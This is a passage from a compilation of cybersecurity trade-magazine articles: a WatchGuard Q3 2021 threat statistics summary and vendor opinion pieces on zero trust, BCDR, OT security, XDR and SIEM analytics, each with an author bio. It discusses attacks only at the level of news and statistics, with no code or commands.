target users with increasingly sophisticated and complex attacks. To help both professionals and casual

Internet users alike better understand the current state of these threats, WatchGuard wanted to share

our quarterly Internet Security Report (ISR), which outlines the latest malware and network attacks in Q3

2021.

The most shocking statistic from this recent report revealed that the volume of endpoint malware and

ransomware exceeded all of 2020 by the end of Q3 2021. The research (done by the Threat Lab) also

found that a significant percentage of malware continues to arrive over encrypted connections, as we

saw in previous quarters, and much more. While most people continue to work in a hybrid or mobile

workforce model, its crucial organizations move beyond a traditional approach to cybersecurity and

leverage layered-security approaches and zero-trust. So, let’s take a look at some of the top insights from

the Q3 ISR:



• Nearly half of zero-day malware is now delivered via encrypted connections – While the

total amount of zero-day malware increased by a modest 3% to 67.2% in Q3, the percentage of

malware that arrived via Transport Layer Security (TLS) jumped from 31.6% to 47%. A lower

percentage of encrypted zero-days are considered advanced, but it is still concerning given that

WatchGuard’s data shows that many organizations are not decrypting these connections and

therefore have poor visibility into the amount of malware hitting their networks.

• As users upgrade to more recent versions of Microsoft Windows and Office, attackers are

focusing on newer vulnerabilities – While unpatched vulnerabilities in older software continue

to provide a rich hunting ground for attackers, they are also looking to exploit weaknesses in the

latest versions of Microsoft’s widely used products. In Q3, CVE-2018-0802 – which exploits a

vulnerability in the Equation Editor in Microsoft Office – cracked WatchGuard’s top 10 gateway

antivirus malware by volume list, hitting number 6, after showing up in the most-widespread

malware list in the previous quarter. In addition, two Windows code injectors (Win32/Heim.D and

Win32/Heri) came in at number 1 and 6 on the most detected list respectively.

• Attackers disproportionately targeted the Americas – The overwhelming majority of network

attacks targeted the Americas in Q3 (64.5%) compared to Europe (15.5%) and APAC (20%).

• Overall network attack detections resumed a more normal trajectory but still pose

significant risks – After consecutive quarters of more than 20% growth, WatchGuard’s Intrusion

Prevention Service (IPS) detected roughly 4.1 million unique network exploits in Q3. The drop of

21% brought volumes down to Q1 levels, which were still high compared to the previous year.

The shift doesn’t necessarily mean adversaries are letting up as they are possibly shifting their

focus towards more targeted attacks.

• The top 10 network attack signatures account for the vast majority of attacks – Of the

4,095,320 hits detected by IPS in Q3, 81% were attributed to the top 10 signatures. In fact, there

was just one new signature in the top 10 in Q3, ‘WEB Remote File Inclusion /etc/passwd’

(1054837), which targets older, but still widely used Microsoft Internet Information Services (IIS)

web servers. One signature (1059160), a SQL injection, has continued to maintain the position it

has held atop the list since Q2, 2019.

• Scripting attacks on endpoints continue at record pace – By the end of Q3, WatchGuard’s

AD360 threat intelligence and WatchGuard Endpoint Protection, Detection and Response

(EPDR) had already seen 10% more attack scripts than in all of 2020 (which, in turn, saw a 666%

increase over the prior year). As hybrid workforces start to look like the rule rather than the

exception, a strong perimeter is no longer enough to stop threats. While there are several ways

for cybercriminals to attack endpoints – from application exploits to script-based living-off-the-land

attacks – even those with limited skills can often fully execute a malware payload with scripting

tools like PowerSploit, PowerWare and Cobalt Strike, while evading basic endpoint detection.

• Even normally safe domains can be compromised – A protocol flaw in Microsoft’s Exchange

Server Autodiscover system allowed attackers to collect domain credentials and compromise

several normally trustworthy domains. Overall, in Q3 WatchGuard Fireboxes blocked 5.6 million

malicious domains, including several new malware domains that attempt to install software for

cryptomining, key loggers and remote access trojans (RATs), as well as phishing domains

masquerading as SharePoint sites to harvest Office365 login credentials. While down 23% from

the previous quarter, the number of blocked domains is still several times higher than the level

seen in Q4 2020 (1.3 million). This highlights the critical need for organizations to focus on keeping



servers, databases, websites, and systems updated with the latest patches to limit vulnerabilities

for attackers to exploit.

• Ransomware, Ransomware, Ransomware – After a steep decline in 2020, ransomware attacks

reached 105% of 2020 volume by the end of September (as WatchGuard predicted at the end of

the prior quarter) and are on pace to reach 150% once the full year of 2021 data is analyzed.

Ransomware-as-a-service operations such as REvil and GandCrap continue to lower the bar for

criminals with little or no coding skills, providing the infrastructure and the malware payloads to

carry out attacks globally in return for a percentage of the ransom.

• The quarter’s top security incident, Kaseya, was another demonstration of the ongoing

threat of digital supply chain attacks – Just before the start of the long 4 th of July holiday

weekend in the US, dozens of organizations began reporting ransomware attacks against their

endpoints. WatchGuard’s incident analysis described how attackers working with the REvil

ransomware-as-a-service (RaaS) operation had exploited three zero-day vulnerabilities (including

CVE-2021-30116 and CVE-2021-30118) in Kaseya VSA Remote Monitoring and Management

(RMM) software to deliver ransomware to some 1,500 organizations and potentially millions of

endpoints. While the FBI eventually compromised REvil’s servers and obtained the decryption

key a few months later, the attack provided yet another stark reminder of the need for

organizations to proactively take steps like adopting zero-trust, employing the principle of least

privilege for vendor access and ensuring systems are patched and up to date to minimize the

impact of supply chain attacks.

In Q3, malware per device skyrocketed and was up for the first time since the pandemic began. Looking

at 2021, it’s clear cybersecurity continues to challenge users. Its critical organizations think about the

long-term ups and downs as well as focus on persistent, concerning trends factoring into their security

posture. A strong cybersecurity strategy includes endpoint protection, multi-factor authentication and

secure Wi-Fi – all important components in a layered approach to security. When implemented properly,

users can drastically mitigate outsider threats.

About the Author

Corey Nachreiner is the CSO of WatchGuard Technologies. A front-line

cybersecurity expert for nearly two decades, Corey regularly contributes

to security publications and speaks internationally at leading industry

trade shows like RSA. He has written thousands of security alerts and

educational articles and is the primary contributor to the Secplicity

Community, which provides daily videos and content on the latest security

threats, news and best practices. A Certified Information Systems

Security Professional (CISSP), Corey enjoys "modding" any technical

gizmo he can get his hands on and considers himself a hacker in the old

sense of the word. Corey can be reached at @SecAdept on Twitter or via

https://www.watchguard.com.



Don’t Become a Horrible Headline: Some Tips on

Redesigning Your Threat Posture for The 2022 Threat

Landscape

By Omar Zarabi, Founder and CEO, Port53 Technologies

As in previous years, the DefCon of the cybersecurity industry is best illustrated by the headlines – each

a cautionary tale. The past two years were witness to a virtual House of Horrors that has propelled

cybersecurity to the top of corporate agendas. The 2020 supply-chain attack on SolarWinds' network

monitoring application Orion affected thousands of the company's customers around the world, including

several government agencies here in the US.

And the list goes on. March 2021: Verkada, a Silicon Valley start-up that provides cloud-based CCTV

systems, was compromised through the simple hijacking of privileged credentials. Attackers were able to

browse the real-time footage of every Verkada customer, including health clinics, psychiatric treatment

centers, and the premises of hybrid and electric car manufacturer Tesla. Also available for viewing:

Verkada's own offices.

Another example of stolen credentials was May's DarkSide ransomware attack on the Colonial Pipeline.

It led to panic-buying of gas by the public, and cost the operator $5 million, in a payout characterized by

The New York Times as a red flag to other threat actors who may see a lucrative pay day on the horizon.

Abnormal times

Even in normal years, this series of events – and others too numerous to mention – would have CISOs

scurrying to the drawing board to reimagine their threat postures. But we are not living in normal years.

In the midst of the dramatic contortions we were seeing in the threat landscape, nature threw a curveball



into the mix. The COVID-19 pandemic ravaged families, business communities, and economies around

the globe. Those enterprises that moved decisively, migrated to the cloud almost overnight and instantly

expanded the attack surface.

The problems came from several different directions. First, employees working from home were using

unvetted personal devices that potentially contained a smorgasbord of vulnerabilities. These devices

used private and third-party networks to connect to the cloud-based environments required for remote

work. And corporate data, sensitive or not, was crossing unknown boundaries on its journey between the

WFH employee and the corporate environment. Penetration testing became unreliable because the

architecture being probed was half in and half out of an organization’s jurisdiction.

Second, DevOps teams – desperately trying to transform massive chunks of their employers’ business

models to adapt to the new normal – were releasing new digital experiences at the speed of demand.

These releases could, depending on circumstances, contain any number of security holes picked up from

new PaaS environments.

Rethink your digital dogma

As has been said at many points throughout cybersecurity history, what we were doing two years ago no

longer works. Threat actors have proved themselves capable of using every trend, every market shift,

every consumer habit, and every employee error to their advantage. Responses from organizations have

not been as swift. While cybersecurity professionals can never quite recall a “quiet past”, the “stormy

present” of 2022 requires a rethink of our digital dogmas if we are to ensure that employees can stay

safe but remain productive.

The starting point: know yourself. Line of business will always have a handle on financial plans,

operations, market conditions, and a range of other touchpoints. For IT and security teams to be

successful, they must compile a comprehensive asset inventory – from the machines in the office to the

devices in employees’ homes, from the tools on laptops to the inner workings of containerized apps in

the cloud.

Next comes triage. Identifying vulnerabilities is trivial next to the task of managing action. Some

vulnerabilities will be common but may not represent great damage if they were to be exploited. Others

may be rare but represent considerable business risk. The general rule of thumb is that if a vulnerability

can cause significant damage and is relatively easy to exploit by an attacker, it should be high on the

patching list. Anything that is high-risk and not readily addressable should be on a watch list.

Free to innovate

All of this, from the compilation of the asset inventory to the patching actions, should be automated where

possible. Several tools today are capable of automatic asset discovery and policy-based patching.

Overworked CISOs and their embattled teams represent the most overlooked security issue in the post-



pandemic era. By empowering professionals with the tools needed to automate the mundane, we free

them to become more effective threat hunters.

Once the basics are in place, organizations will be better placed to meet regulation and compliance

obligations. Policies alone will not allow you to prepare the reports required by auditors. And good

intentions will not satisfy the strict requirements of standards such as PCI-DSS. The good news is cloudservice

providers and other vendors are beginning to provide controls such as MFA and DNS security,

and are even offering training sessions for end users to prepare them for the hybrid-work future.

But chasing the regulators in a constantly reactive mode makes for poor security strategy. There is no

substitute for gaining a deep and broad understanding of your organization’s environment and selecting

the visualization and automation tools that best fit your circumstances, your architecture, and your

business goals. Getting the basics in place – asset inventory, vulnerability management, and user

awareness – will give you a strong foundation to secure your digital estate.

What next?

Once you have mastered your environment, you can turn your attention to some of the latest policies and

tools that are being deployed against cybercriminals. Many of the headline-grabbing incidents that we

have seen would not have occurred but for a lapse in the management of privileged credentials.

SolarWinds’ Orion, for example, uses privileged access to connect to other systems, which is how

attackers were able to compromise so many other organizations. Privileged access management (PAM)

is an emerging technique that allows CISOs and their teams to stipulate how accounts connect to

environments, using policies such as session monitoring, password rotation, least privilege, just-in-time

provisioning, and the elimination of shared accounts to keep estates safe while avoiding hits on employee

productivity.

Other practices include Zero Trust, which has become something of a hot topic. Allowing everything in,

and assuming all processes to be suspect until they can prove themselves otherwise, is an approach that

shows how far removed we are from the recent past. Here, we not only assume we are going to be

attacked; we assume we already have been. It is a grim yet justifiable assumption that accurately reflects

the world in which we now live.

Do not dismay, however. The headlines of horror may imply an inevitability in becoming a cyber-victim,

but their postmortems also show a path to risk remediation. There are tools you can procure, policies you

can enact, and action you can take that will ensure that your organization’s name is not the next to be

splashed across media pages.



About the Author

Omar Zarabi Founder and CEO of Port53 Technologies.

Growing up in a small, family-run organization, I saw firsthand the

challenges the ever-changing technological landscape presented to

resource-restrained IT teams. With a BA in Economics from UC Davis, I

started my cybersecurity career at OpenDNS, where I was responsible

for delivering the DNS security solution to small and mid-sized

businesses in the US and Asia. I worked with thousands of IT

professionals in the SMB space, and truly learned their biggest pain

points, especially as it pertained to cloud adoption and cybersecurity -

two rather new and fluid trends in the SMB IT space.

In September of 2016, a little over a year after Cisco acquired OpenDNS,

I founded Port53 Technologies and its CEO. Port53 is focused on

delivering enterprise-grade, cloud-delivered security solutions that are

easy to deploy, simple to manage and extremely effective, helping

customers not only get a big-data and predictive approach to security, but also a more integrated and

automated approach.

Omar Zarabi can be reached online at (Twitter, Facebook, Linkedin )

Port53 at Port53 (Facebook, Twitter, Linkedin, Youtube)



Have We Learned from Our Past Mistakes to Prevent

Future Cyberattacks?

By Marc Packler, President, CISO Advisory, Silent Quadrant

Gartner’s article, “The Top Cybersecurity Predictions for 2021-2022,” contains a quote from philosopher

George Santayana: “Those who cannot remember the past are condemned to repeat it.” Reading the

article made me ponder whether we, as cybersecurity practitioners, actually do learn enough from our

collective cybersecurity past to effectively protect present activities and to anticipate and meet future

threats.

Have we really learned from our past? Because protecting the cyber realm is such a broad duty, I would

have to say the answer is not yes or no, but it is yes and no. As a society, it appears we’ve embraced or

at least acknowledged the ease with which cyber criminals can manipulate enterprise systems, and we’ve

generally accepted the risks-to-consequences ratios in both our personal and professional lives. As a

result, many people take some measures to protect their personal home networks, but ultimately many

just don't think they will be the victim of a cyber attack. So, I would say that yes—most people have

learned that they need to protect themselves in some ways—but I would also say no to whether they

generally do enough. Similarly, the overwhelming majority of corporations have run risk analyses



egarding the use (or not) of various cybersecurity measures against their cost, and most have chosen

to implement at least some protective measures. So, yes, the corporate world has learned that not taking

measures to safeguard their networks would likely negatively impact their bottom lines at some point;

however, I would again say no to whether they generally do enough or to whether they’re generally using

the appropriate tools.

Also, why do we still need to tell a story about cybersecurity to change corporate culture and get serious

funding for security? Just walk around your organization, and everyone is on the network. Without it, little

work gets done and productivity drops significantly. If this tool is so important, why do we not treat it as

such? If Gartner’s data is accurate, lessons are coming slowly to many corporations:

• By 2025 ONLY 40% of boards of directors will have a dedicated cybersecurity committee

• By 2025, ONLY 70% of CEOs will mandate a culture of organizational resilience to combat threats

Another lesson still being taught: Do most corporations know they should be enforcing updates for known

security vulnerabilities that have been documented and announced by respective cyber communities to

keep us all safe? The answer is yes, but do most of them do enough or do it effectively? That answer is

no. Otherwise, consistently updating computers and keeping them current with the latest patches/security

fixes across the enterprise would stop 99% of vulnerabilities exploited to date.

Inconsistent system updates greatly expand cyber vulnerabilities and risks. If this is known and

understood, then why is it seemingly so difficult to succeed at attaining effective cybersecurity? It’s

because many companies don’t effectively cultivate three critical components of their cybersecurity

processes: 1) people, 2) culture and 3) technology. We must have people who follow the security

processes, a corporate cyber culture that supports its people and the processes, and the technology to

implement the processes, when necessary.

If we agree these are three critical components of effective cybersecurity processes, then we must

remember that people are trainable; the culture can be fixed with training and leadership from senior

management; and technology is constantly adapting with the use of artificial intelligence and machine

learning. Strengthening cybersecurity processes through people, culture, and technology costs

corporations valuable time and money, so it’s wise to use these three resources in the most practical and

beneficial ways possible. This often means that the latest and greatest technologies or programs aren’t

actually necessary to achieve effective cybersecurity.

As an example, look at zero trust. It is an architecture and not a technology, but the cybersecurity industry

very often wants customers to buy all new equipment to implement zero trust. This ends up helping the

bottom lines of the said cybersecurity companies, but are organizations any safer? That is often arguable,

but even newer tools have no better chance of succeeding than in the past unless the people using them

use them appropriately, born out of a culture that teaches and supports such use.

Aside from malicious actors themselves, if we believe people, or network users, are one of the biggest

threats in the cybersecurity realm, an immediate and cost-effective fix is to engender a culture of

cybersecurity professionalism in our everyday users. Train the users to not only prioritize necessary

updates on their systems but to follow other cyber hygiene measures regarding the use of email, the



internet, etc. How much training is sent to the employees? Is it completed, and is it a priority? Do the

employees understand the risks associated with not following proper cybersecurity processes? And is

the example of being a good cybersecurity steward exemplified from the top down—does it begin at

senior levels within the company? This is often the best way for culture to be impacted. A great example

of how senior levels can set the example can be taken from Netflix and the implementation of their leave

policy, which is to say they have no complex leave policy. As long as people complete their work and

don’t leave anyone else in the lurch, employees may take leave when and where they’d like. Employees

were initially disbelieving; however, when Reed Hastings, the chairman of Netflix, and the leadership staff

posted photos of their respective vacations, it changed the culture quickly because everyone could see

the boss was embracing the company’s approach to leave. This leave approach certainly wouldn’t work

in all organizations, but that is beside the point. It’s an example of how leaders in an organization can

positively influence their employees.

With predictions that threat actors will weaponize operational technology environments to cause human

casualties by 2025, and with the influx of over-the-air updatable programmable logic controllers and

continued malicious attacks on our SCADA networks, it’s more imperative than ever to learn from and

apply the cybersecurity lessons of the past. We are starting to see more broad negative effects of

breached or attacked systems on administrative networks today. Not only may companies have to stop

operations temporarily, but entire supply chains can be affected, which ultimately can affect the entire

country.

As IT and cybersecurity professionals, it's our duty and challenge to push industry executives to prioritize

cybersecurity as a high-interest item in the funding drills corporations exercise yearly. We must motivate

them to continue to bake-cybersecurity-in from the initial design and conception phases of budgeting

versus tacking it on at the end of the process. To prevent cyber attacks such as those on Sony in 2014

or more recent examples such as Colonial Pipeline or JBS meat processing, we must use all the tools at

our disposal and more effectively apply the cybersecurity lessons of the past. This means not only

budgeting and applying funds to cybersecurity but also cultivating strong cybersecurity processes via

three main components: people, culture and technology. As Gartner pointed out, “99% of vulnerabilities

exploited will continue to be ones that teams knew existed.”



About the Author

(Source attribution: Silent Quadrant)

Marc is the President, CISO Advisory at Silent Quadrant. He is a widely

acknowledged subject matter expert and public speaker on matters of digital

protection and risk management.

Pioneering, innovative, highly accomplished, and decorated, Marc leverages an

immense and diverse skillset – derived over the course of his 25+ year career in

the United States Air Force – to positively impact digital security, digital

transformation, risk management, and strategic operations within organizations

across a vast array of industries.

Achieving the rank of Colonel, Marc’s rich military career included assignments as:

• Commander, Air Force Cyberspace Capabilities Center

• Commander, 375th Communications Group

• Director, Legislative Affairs, United States Cyber Command

• Commander, 2nd Communications Squadron

• Executive Officer, Office of Warfighting Integration

• Congressional Fellow for Senator Ben Nelson (Nebraska)

• Fellow, Center for a New American Security

With digital security at its core, Marc’s experience within both the public and private sectors spans

executive leadership, digital transformation, artificial intelligence, machine learning, robotics,

governance, and legislative affairs, among many other areas. Marc maintains the prestigious credentials,

CompTIA Advanced Security Practitioner (CASP+), Certified Information Systems Security Professional

(CISSP), Certified Information Security Manager (CISM), as well as Project Management Professional

(PMP), and Masters’ Degrees in both National Security Strategy and Management Information Systems.

Marc can be reached on the Silent Quadrant website, LinkedIn or email marc@silentquadrant.com.

(Source attribution: Silent Quadrant)



How to strengthen cyber resilience with Unified BCDR

By Joe Noonan, General Manager, Unitrends and Spanning

Cybercrime and hybrid work environments prompted by the pandemic have significantly impacted the

way organizations protect and store their data. Data is living in multiple places, and backups now must

protect data centers, endpoints, multiple clouds and SaaS. More than ever, IT professionals need to

incorporate unified business continuity and disaster recovery (BCDR) plans into their cyber resilience

strategy to protect the organizations they serve.

Cyber resilience goes beyond firewall and patching. It refers to how well an organization responds to

cyber threats and involves a strategy that accounts for planning, detecting, defending and responding in

case of an attack. There is also a clear process in place for recovery and business continuity.

It is difficult for IT professionals to find time for cyber resilience planning when they’re juggling so many

other responsibilities. But not having a strategy in place can be disastrous for an organization.

Terms to Know

When it comes to BCDR, there are two terms that will guide your cyber resilience strategy – recovery

time objective (RTO) and recovery point objective (RPO). RTO is the amount of time it will take to have

the business back online. RPO refers to how much data an organization can afford to lose as it pertains

to time or amount of information. The RPO for a bank, for example, would be close to zero because as

soon as the system goes down, hundreds, even thousands of transactions can take place. A bank cannot

afford to lose this information and it would be difficult to recover if the IT environment is non-operational.

One way to think about RPO is the more difficult it is to recover data, or create it from scratch, the shorter

RPO an organization will need to have. Once both RTO and RPO are established, it’s time to look for a

unified BCDR tool.



What to look for in a solution

Cybercriminals are becoming more cunning, driving the need for backup and recovery. A successful

backup can eliminate the impact of a cyberattack. Cybercriminals know this so they look for alternate

ways to disable, encrypt and delete those backups. An efficient unified BCDR solution is built on hardened

Linux – not Windows – so it is not as vulnerable. Another way to fend off cyber criminals is by storing

offsite data in an immutable format, which makes it untouchable and prevents attackers from making

changes to it.

Additionally, there are innovative backup appliances that can protect data wherever it lives. Today, there

are appliances that provide powerful data protection and fit in your pocket! These solutions are perfect

for small-office settings or even home offices since they do not require a server rack. They are extremely

quiet and come with built-in software tests recoverability right on the box. This ensures data will be

available whenever needed.

AI saves time

Organizations should look for solutions that use artificial intelligence (AI) and machine-learning to identify

suspicious activity and alert administrators to possible ransomware before it spreads. AI has multiple

benefits, among them, allowing IT professionals to cut wasted time on false alerts and backup

remediation by up to 50%. An AI-powered assistant can think the way a technician does, prioritizing

issues in the most critical systems so your actual technicians can focus on what matters most.

Another thing to keep in mind when considering a unified BCDR solution is opting for tools that include

anti-phishing options to protect against credential compromise and account takeover attacks. People are

the first line of defense, and they may accidentally put an organization at risk if they lack security training.

An effective tool maximizes productivity

A unified BCDR solution should offer a single view of the entire data landscape, so technicians do not

have to move between multiple systems. This saves them time and decreases room for error. Another

way a BCDR tool can maximize productivity is through automation. Technicians can spend more than a

quarter of their day monitoring, managing and troubleshooting backups. Automated solutions proactively

fix common problems in the backup environment, therefore pulling double duty by saving technicians

time and securing the environment.

Don’t let compliance fall through the cracks

Some organizations operate in highly regulated industries such as government or healthcare, which

mandate how data must be secured. Regardless of the industry, most companies must adhere to

compliance standards, especially if they want to be approved for cyber insurance. Part of a cyber

resilience plan includes policies around data retention and automated backups to guarantee compliance.

Organizations must be prepared to properly store, archive and recover compliance data as a proactive

measure.



A BCDR solution with automated disaster recovery (DR) testing capabilities also helps with executing

service level agreements (SLA). It allows organizations to schedule a time and specify the systems that

need to be tested and then takes care of it automatically. If a test identifies an SLA cannot be completed,

adjustments can be made, and tests run again to check if the changes worked. This type of testing

protects against unplanned downtime.

Regardless of where data lives, a unified BCDR solution can help IT professionals reinforce their

organization’s cyber resilience, free up time to focus on more important tasks, adhere to compliance

regulations and ensure SLAs are met.

About the Author

Joe Noonan is the General Manager of Unitrends and Spanning. Joe

has spent over 18 years delivering hardware and software technology

solutions for virtualization, cloud, data protection, and disaster

recovery. He has worked for Unitrends since 2010 driving its software

product strategy for data protection, recovery automation, and cloud

disaster recovery and migration. Joe has also held roles in developing

technology alliances and is now the GM for the backup and DR suite at

Kaseya, which includes Unitrends, Spanning and Kaseya-branded

backup solutions. Joe can be reached at unitrends.com/contact.



3 Cybersecurity Certainties for 2022

By Bill Moore, XONA

As businesses transitioned to hybrid work models in 2021, critical integrations between IT and OT

technologies introduced new vulnerabilities that threat actors exploited with shocking frequency and

effectiveness.

This was especially true for manufacturers, energy producers, and utilities, which increasingly rely on

remote operations capacity to empower distributed teams to engage physical infrastructure from

anywhere in the world. As a result, many organizations experienced an ICS/OT cybersecurity incident in

the past year, costing companies millions of dollars in recovery and opportunity costs.

With everything from ransomware attacks to data breaches becoming more prevalent and impactful, it’s

even more important that those charged with protecting critical infrastructure enhance their defensive

postures to meet the moment. As they reflect on their cyber readiness and plan for the year ahead, here

are three cybersecurity certainties that should guide their decision-making processes.



1. Cybersecurity Incidents Will Become More Expensive

Cybercrime is big business, collectively netting more than $1.5 trillion annually, making it more valuable

than many of the biggest companies in the world. Money is the main motivator for today’s threat actors,

who often view cybercrime as a low-risk, high-reward financial opportunity.

Therefore, companies shouldn’t be surprised that cybersecurity incidents are becoming more expensive.

Most notably, ransomware payments are soaring. In 2018, the average ransomware payment

approached $7,000. By 2020, many companies were paying more than $200,000. This year, the average

ransomware payment increased by 518 percent, a shocking surge reflecting digital infrastructure’s

centrality for many companies' operational continuity.

At the same time, the cost of a data breach reached a record high in 2021, surpassing $4 million for the

first time. With cybersecurity insurance premiums similarly increasing, rapidly, companies are left with

little recourse for mitigating the cost of a cybersecurity incident.

While companies may be tempted to rely on previously purchased IT-focused cybersecurity products,

the rising costs of failure are a reminder that investing in an OT-specific cybersecurity solution is an

investment with tremendous returns.

2. Failure to Secure Digital Infrastructure Will Have Real-world Implications

In 2021, cybersecurity failures interfered with manufacturing operations, exposed sensitive data, and

eroded brand reputation. Cybersecurity incidents will have even more heightened real-world implications

that put people at risk in the year ahead.

For example, looking to leverage access to company networks, ransomware gangs are exfiltrating

company data, raising the stakes for victims while increasing their leverage to extract high payouts. This

trend will continue in 2022, compounding the consequences of a cybersecurity incident.

Most importantly, as manufacturers, energy producers, and utilities continue integrating IT and OT

systems, cybersecurity incidents put public safety on the line. A 2021 event in Oldsmar, Florida, where a

threat actor capitalized on an IT vulnerability to access OT capabilities in an attempt to poison the city’s

water supply, is emblematic of the challenges many companies and municipalities face.

This year, cybercriminals demonstrated the capacity to instigate fear, uncertainty, and chaos, causing

long gas lines, production shortages, and close encounters that make it clear that companies need to

prepare for the failure to secure digital infrastructure to have real-world implications in 2022.



3. Threat Actors Will Continue to Evolve

Cybercriminals are agile, always ready to adapt to exploit new vulnerabilities and circumstances to

maximize impact.

For instance, in November 2021, the Federal Bureau of Investigation (FBI) released a memo to

companies completing “time-sensitive financial events,” noting that threat actors are targeting these

organizations with ransomware attacks, looking to capitalize on the high-stakes, urgent nature of their

work to extract timely payments.

It’s likely that cybercriminals will look to exploit manufacturers, energy producers, and utilities in the same

way. However, this tactical adjustment is a reminder that threat actors are continually evolving, and

companies need to change too.

Especially as companies continue to adopt experimental workplace arrangements, they need to be more

mindful than ever of the ways these changes expose their digital infrastructure to evolving threat trends.

Cybersecurity Risks May Be Likely, But the Prepared Are More Likely to Succeed

Effective cybersecurity practices don’t happen by accident. They are the result of careful assessments,

intentional planning, and successful implementation.

The past year was uniquely challenging as threat actors too often gained the upper hand, exploiting new

vulnerabilities in IT and OT integrations to wreak havoc among critical infrastructure. Their continued

success isn’t inevitable, making today the right time to prepare for tomorrow’s challenges.

About the Author

Bill Moore is the CEO and Founder, XONA, providers of a unique

“zero-trust” user access platform especially tailored for remote

Operational Technology (OT) sites. Bill is currently working with

global power, oil and gas, and manufacturing customers to reduce

their remote operations costs and cyber risks. Bill brings more

than 20 years’ experience in security and the high-tech industry,

including positions in sales, marketing, engineering and

operations.



Is XDR The Right Solution for Today’s Security Threats?

Defining XDR’s Role in the Security Stack

By Steve Garrison, VP Marketing, Stellar Cyber

XDR and Open XR are two of the latest buzzwords in the cybersecurity tools market, but there are many

definitions of XDR and several approaches to delivering it. Let’s clear the air a little.

In general, cybersecurity products use preventive physical and software measures to protect the network

and its assets from unauthorized access, modification, destruction, and misuse. These products typically

protect specific assets on the network:

• Firewalls: prevent unauthorized users from accessing the network by allowing or denying traffic.

• Anti-Virus/Malware software: protects network endpoints and servers from becoming infected

by damaging software that can corrupt files, export sensitive data, or perform other malicious

activities.

• Application Security: systems look for and block vulnerability points in application software.

• Network Access Control: systems manage access permissions for authorized users and

devices, preventing unauthorized users from gaining access.

• User Behavior Analytics: solutions monitor user activity, baseline normal behavior, and alert on

activities that deviate from normal activity.

• Network Traffic Analysis: Network Detection and Response (NTA/NDR) products analyze

network traffic, look for abnormal patterns that can indicate attacks, and act based on the results.

Network traffic does not lie and contains strategic data for threat detection.

• Cloud Security: solutions protect resources in the cloud.

• Intrusion Prevention Systems (IPS): monitor for and block attacks from outside users or

processes that get past the firewall.

• Security Information and Event Management (SIEM): SIEM products collect data from various

device logs on the network and can monitor for anomalies. Traffic-based NTA/NDR products



complement SIEMs by analyzing logs and acting. In fact, NTA/NDR is critical to advancing

visibility beyond logs.

As you can see, there’s a lot to protect in a network, and a lot of approaches to protecting it. But rather

than having a dozen or more point solutions (each with its own interface console) to manage, wouldn’t it

be easier, faster, and more efficient to have just one? That’s where XDR / Open XDR comes in.

Definitions of XDR

Initial definitions of XDR – eXtended or Everything Detection and Response – envisioned it as a single

platform that unifies detection and response across the entire security kill chain. The idea is that instead

of manning a dozen or more separate security consoles to monitor and protect the network, XDR unifies

the telemetry from those tools and presents it in a single dashboard. The more advanced products not

only unify the data, but also correlate and analyze it automatically to present a prioritized list of threats

with recommendations about how to neutralize them.

So how does the market define XDR, specifically? That depends on who you ask. According to Rik

Turner, a lead analyst at Omdia who coined the XDR acronym, XDR is “a single, stand-alone solution

that offers integrated threat detection and response capabilities.” To meet Omdia’s criteria to be classified

as a “comprehensive” XDR solution, a product must offer threat detection and response functionality

across endpoints, networks, and cloud computing environments.

Gartner’s definition is similar in that it points to features such as alert and incident correlation, built-in

automation, multiple streams of telemetry, multiple forms of detections (built-in detections), and multiple

methods of response. However, Gartner requires XDR to be achieved through consolidating multiple

proprietary, vendor-specific security products.

Forrester’s definition of XDR requires the platform to be anchored around an EDR. It defines Native XDR

as EDR integrating with a vendor’s own security tools; Hybrid XDR as EDR integrating with third-party

security tools; a SAP (Security Analytics Platform) as a platform without built-in EDR, but with built-in

NAV and SOAR with third-party integrations; and SSA (Standalone Security Analytics) as those platforms

that rely solely on third-party tools for telemetry sources and responses.

Open XDR

Open XDR was initially created by Stellar Cyber with the same features Gartner mentions, except that

not all the security products/components have to be from the same vendor. Instead, the platform is open

and integrates with third-party security tools. Some components are built-in, and others are added

through deep third-party integrations.

The Open XDR moniker was later picked up by vendors who purely rely on a wide ecosystem of thirdparty

tools for telemetry sources and response, but who don’t offer any built-in components.



How Open XDR Helps

Open XDR addresses a key reality in organizational cybersecurity infrastructures, which is that

companies have already invested heavily in security tools, and they don’t want to have to abandon those

investments to adopt XDR. Rather, Open XDR allows companies to leverage these existing investments

while making them more valuable by automatically correlating their data with data from other tools and

sensors.

In addition, the more advanced Open XDR platforms leverage AI and machine learning to cut down on

analysts’ “alert fatigue.” Instead of managing thousands of alerts from a dozen or more tools, XDR

combines related alerts into higher-level incidents and automatically dismisses many alerts based on

what it “learns” to be normal behavior in any given environment.

Given the rising tide of cybersecurity attacks affecting every type of organization, combined with a global

shortage of cybersecurity analysts and high analyst turnover rates and burnout, any solution that

improves protection along with analyst productivity is welcome indeed. That’s the real promise of XDR.

About the Author

Steve can be reached online at sgarrison@stellarcyber.ai and at our

company website http://stellarcyber.ai.



Why the Future of Threat Detection and Prevention is

Unified Security and Risk Analytics

Why True AI/ML Capabilities are Essential for Next-Gen Risk Analytics

By Sanjay Raja, VP of Product Marketing at Gurucul

As cloud adoption continues to grow and remote work becomes the new normal, security teams are

facing increased challenges with decreased visibility and a larger influx of security event data. As

ransomware attacks continues to rise (i.e., recent SonicWall data showed 148% increase through Q3’21),

SecOps teams are struggling to identify attacks before damage is done. As a result, they’re chasing

solutions that accelerate detection and response, while increasing operational efficiencies.

Unfortunately, in many cases vendor claims only provided minimal improvements that are not keeping

pace with the today’s threat actors. Traditional SIEMs and Endpoint-focused XDR are not fulfilling the

promise of reducing the burden on understaffed security teams. The volume of alerts and false positives

make it an uphill battle. For organizations wanting to reduce cyber risk across the on-prem, cloud, and

remote infrastructures commonly supported today, security teams need to leverage unified data

collection, a multitude of analytics, non-rule-based Machine Learning (ML) and Artificial Intelligence (AI),

consolidated investigation interfaces, and targeted automation for faster response.



A very small set of next-gen SIEM solutions are innovating through more unified security and risk

analytics capabilities that are crucial for success today. In this article, I’d like to explore why the future of

threat detection and response is stemming from these new advancements.

SIEM was initially designed primarily for log collection and storage for compliance, then evolved to include

the correlation of more log data sources for threat detection. Over time that functionality increased to

integrate log, network, and endpoint data into a single location and match it up with security events. This

helped analysts investigate commonalities or groups of related events. And as rules were developed

around these related events, the SIEM could help to detect known threats.

Then came the rise of the terms like Machine Learning and Artificial Intelligence (ML/AI) – offering the

promise of a silver bullet to solve threat detection and response. However, these terms were commonly

misused and in reality were just rule-based analytics engines that would conditionally gather more data

for greater context. However, as attackers stayed hidden inside the network longer, rule-based analytics

